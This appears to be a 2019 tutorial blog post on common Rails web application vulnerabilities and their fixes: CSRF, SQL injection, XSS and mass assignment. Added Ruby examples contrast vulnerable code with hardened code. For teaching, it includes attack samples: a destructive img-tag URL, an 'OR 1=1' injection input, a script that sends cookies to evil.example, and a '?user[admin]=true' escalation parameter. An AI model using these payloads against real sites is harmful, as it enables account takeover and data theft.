Security Problems in Web Applications

Aug 25, 2019

Introduction

The growth of web applications has benefited business sectors such as e-commerce and banking, as well as end users. However, moving data across the internet has also attracted malicious actors. Users routinely hand sensitive data of varying levels to an application in order to complete a transaction, and a security vulnerability in that application can do great harm to the business owner as well as to the customers.

Some of the security problems in web applications:

Session Hijacking

A session is the mechanism an application uses to remember a user and keep track of them across requests; it is usually identified by a session ID stored in a cookie. If that traffic travels in clear text, an intruder positioned between the user and the server can read the session ID (and any credentials sent along the way) and replay it to take over the session. So it is necessary to serve the whole site over HTTPS, which encrypts the data in transit. For that, obtain a TLS certificate (commercial, or free from a CA such as Let's Encrypt) and set up the web server to support it. Then, in config/application.rb, add the following configuration, which redirects plain HTTP requests to HTTPS, marks cookies as Secure and sends an HSTS header:

    config.force_ssl = true

Cross-Site Request Forgery (CSRF)

CSRF is an attack in which the attacker causes the victim's browser to send a request to an application where the victim is already logged in, for example by luring them to a page that contains a link or image pointing at a destructive URL. Because the browser attaches the session cookie automatically, the server treats the forged request as the victim's own. For example:

<img src = "http://www.webapp.com/project/1/destroy">

If the user's session on www.webapp.com is still alive, merely loading a page that contains this image tag makes the browser request the URL (no click is needed), and the user has unknowingly deleted his project number one. The two standard defences are to never change state on a GET request (Rails routes destroy to DELETE) and to require a per-session authenticity token on every state-changing request, which Rails provides through protect_from_forgery.
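The two defences described above, as an added example in plain Ruby that is not code from the original post: a minimal router that only destroys on DELETE, plus a synchroniser-token check. The session, the request hashes and the project store are constructed for this demo and stand in for Rails' session, request and model; no framework is required to run it.

```ruby
require "securerandom"

# Added example, not code from the original post: a plain-Ruby stand-in for the two
# defences Rails applies against CSRF. The session, the request objects and the
# project store are constructed hashes; no web framework is involved.

# Defence 1: the only route that deletes a project is DELETE /projects/:id, so a
# GET issued by an <img> tag can never reach it. (A browser form cannot send
# DELETE; Rails tunnels it as POST with _method=delete, handled the same way.)
def route(request)
  m = request[:path].match(%r{\A/projects/(\d+)\z})
  return nil unless m
  case request[:method]
  when "GET"    then [:show, m[1].to_i]
  when "DELETE" then [:destroy, m[1].to_i]
  end
end

# Defence 2: the synchroniser token. The server stores a random token in the
# session and embeds it in its own forms; a state-changing request must echo it.
# A page on another origin cannot read the victim's session or the token.
def csrf_token_for(session)
  session[:csrf_token] ||= SecureRandom.hex(16)
end

# Constant-time comparison so an attacker cannot guess the token byte by byte
# from response timing.
def secure_compare(a, b)
  return false unless a.is_a?(String) && b.is_a?(String) && a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

def verified_request?(session, request)
  return true if %w[GET HEAD].include?(request[:method]) # safe methods need no token
  secure_compare(session[:csrf_token], request[:params]["authenticity_token"])
end

# Returns an HTTP-style status; mutates `projects` only when a verified destroy succeeds.
def handle(session, request, projects)
  action, id = route(request)
  return 404 unless action
  return 422 unless verified_request?(session, request)
  projects.delete(id) if action == :destroy
  200
end

def run_demo
  session  = {}
  token    = csrf_token_for(session)          # issued when the victim logged in
  projects = { 1 => "project one", 2 => "project two" }

  requests = [
    # The post's <img src="http://www.webapp.com/project/1/destroy">: a GET to a
    # URL that is not a route at all in this design.
    { method: "GET",    path: "/project/1/destroy", params: {} },
    # Even an <img> pointing at the real resource URL only reaches :show.
    { method: "GET",    path: "/projects/1",        params: {} },
    # An auto-submitting form on the attacker's page: right method and path, and the
    # browser attaches the session cookie, but the attacker cannot supply the token.
    { method: "DELETE", path: "/projects/1",        params: {} },
    # The application's own delete button, which carries the hidden token field.
    { method: "DELETE", path: "/projects/1",        params: { "authenticity_token" => token } },
  ]

  statuses = requests.map { |r| handle(session, r, projects) }
  [statuses, projects.keys] # => [[404, 200, 422, 200], [2]]
end
```

Only the last request, the one carrying the token the server itself issued, removes a project; the image-tag and cross-site form attempts are refused before any state changes.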

SQL Injection

It is the injection of attacker-controlled SQL through a user input field, which can bypass authentication and read or manipulate the database. For example:

If the input field for user_id receives 105 OR 1=1 and the application builds its query by string concatenation, the statement sent to the database is SELECT * FROM Users WHERE UserId = 105 OR 1=1;. Since OR 1=1 is always true, the WHERE clause matches every row and the attacker gets all the users from the database. The fix is to bind user input as a parameter (in Rails, where("UserId = ?", id)) rather than interpolating it into the SQL string, and to validate that an ID really is numeric before it reaches the query layer.
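How the injected statement above arises and why a bound parameter defuses it, as an added example that is not code from the original post. The quote helper mirrors what a SQL driver does when binding a string literal; it is written out here so the file runs without Rails or a database.

```ruby
# Added example, not code from the original post. No database is used: each
# function returns the SQL text that would be sent, so the difference between
# interpolation and binding is visible directly.

def vulnerable_query(user_id)
  # Input is glued into the statement: the database parses "OR 1=1" as SQL.
  "SELECT * FROM Users WHERE UserId = #{user_id};"
end

# Escape a value the way a driver binds a string literal: wrap it in single
# quotes and double any embedded single quote. Integers pass through unquoted.
def quote(value)
  return value.to_s if value.is_a?(Integer)
  "'" + value.to_s.gsub("'", "''") + "'"
end

def parameterized_query(user_id)
  # Input stays data: even "105 OR 1=1" becomes a single string literal that is
  # compared against UserId as a whole and matches no row.
  "SELECT * FROM Users WHERE UserId = #{quote(user_id)};"
end

# Stricter still: reject anything that is not a plain number before it gets
# anywhere near the query layer.
def safe_query(user_id)
  raise ArgumentError, "user_id must be numeric" unless user_id.to_s.match?(/\A\d+\z/)
  parameterized_query(Integer(user_id))
end
```

With the post's input, vulnerable_query returns the all-rows statement from the text, while parameterized_query returns WHERE UserId = '105 OR 1=1' and safe_query refuses the input outright.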

Cross-Site Scripting (XSS)

It is one of the most destructive vulnerabilities in web applications: the attacker inserts JavaScript code that runs inside the application's pages, in the application's origin, so the script can access other pages on the same domain and read their data. The most common entry points are message posts, user comments and any other field whose content is rendered back to other users. XSS can steal the cookie, hijack the session, redirect the victim to a fake website, display advertisements for the benefit of the attacker or install malicious software through security holes in the web browser. The primary defence is to HTML-escape every piece of user-supplied content on output (Rails does this for <%= %> by default) and to bypass escaping with raw or html_safe only for strings the application generated itself; marking the session cookie HttpOnly, which Rails also does by default, keeps a script that does get through from reading it.
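The vulnerable rendering beside the escaped one, as an added example that is not code from the original post. It uses Ruby's standard ERB, which, unlike Rails' view layer, does not escape by default, so both behaviours can be shown in one file; the attacker's comment is a constructed payload.

```ruby
require "erb"

# Added example, not code from the original post. Plain ERB does not escape
# output; Rails' <%= %> does, which is exactly the difference shown here.

# Constructed payload: a comment that exfiltrates the reader's cookie.
ATTACKER_COMMENT = %(Nice post!<script>document.location='http://evil.example/?c='+document.cookie</script>)

# Vulnerable: the comment body is written straight into the page, so every
# reader's browser executes the script in the origin of the application.
UNSAFE_TEMPLATE = ERB.new("<li class=\"comment\"><%= comment %></li>")

# Hardened: HTML-escape on output. ERB::Util.html_escape rewrites & < > " '
# as entities, so the browser renders the payload as text instead of running it.
SAFE_TEMPLATE = ERB.new("<li class=\"comment\"><%= ERB::Util.html_escape(comment) %></li>")

def render_unsafe(comment)
  UNSAFE_TEMPLATE.result_with_hash(comment: comment)
end

def render_safe(comment)
  SAFE_TEMPLATE.result_with_hash(comment: comment)
end

# Crude check a test or scanner can apply to rendered output: did a script
# tag survive into the HTML?
def contains_script_tag?(html)
  html.match?(/<script\b/i)
end
```

Rendering the payload through render_unsafe leaves a live script tag in the page; render_safe turns it into &lt;script&gt;..., harmless text that the browser displays but never executes.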

Mass Assignment

Mass assignment is a feature of Rails that lets an application create or update a record from a hash of attributes in a single call. For example:

  User.new(params[:user])

Unfortunately, if the users table has a column called 'admin' which controls administration access, any user can make themselves an admin simply by adding a parameter to the request, such as

     ?user[admin]=true

Rails closes this hole with strong parameters: the controller must explicitly whitelist the attributes it accepts, for example params.require(:user).permit(:name, :email), and any attribute not on that list, admin included, is dropped before it reaches the model.
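The hole and the whitelist that closes it, as an added example that is not code from the original post. A small User class stands in for an ActiveRecord model, and PARAMS is the hash Rails would parse from the query string ?user[name]=mallory&user[admin]=true (constructed here); the permit helper is a hand-written stand-in for params.require(:user).permit(:name).

```ruby
# Added example, not code from the original post. The model and the parameter
# hash are constructed stand-ins for ActiveRecord and ActionController::Parameters.

# What Rails would parse from ?user[name]=mallory&user[admin]=true
PARAMS = { "user" => { "name" => "mallory", "admin" => "true" } }

class User
  attr_reader :name, :admin

  # Mass assignment: every key in the hash becomes a setter call, exactly as
  # an ActiveRecord model does with User.new(params[:user]).
  def initialize(attrs = {})
    @admin = false
    attrs.each { |k, v| public_send("#{k}=", v) }
  end

  def name=(v)
    @name = v
  end

  def admin=(v)
    @admin = (v == true || v == "true")
  end
end

# Stand-in for params.require(:user).permit(*allowed): keep only the named
# attributes; everything else, "admin" included, never reaches the model.
# (Rails logs or raises on the dropped keys depending on
# config.action_controller.action_on_unpermitted_parameters.)
def permit(params, key, *allowed)
  allowed_names = allowed.map(&:to_s)
  params.fetch(key).select { |k, _| allowed_names.include?(k) }
end

# Vulnerable: whatever the client sent becomes model attributes.
def create_user_vulnerable(params)
  User.new(params["user"])
end

# Hardened: only :name is accepted from the request.
def create_user_safe(params)
  User.new(permit(params, "user", :name))
end
```

With the same request, create_user_vulnerable produces an admin account while create_user_safe produces an ordinary user named mallory.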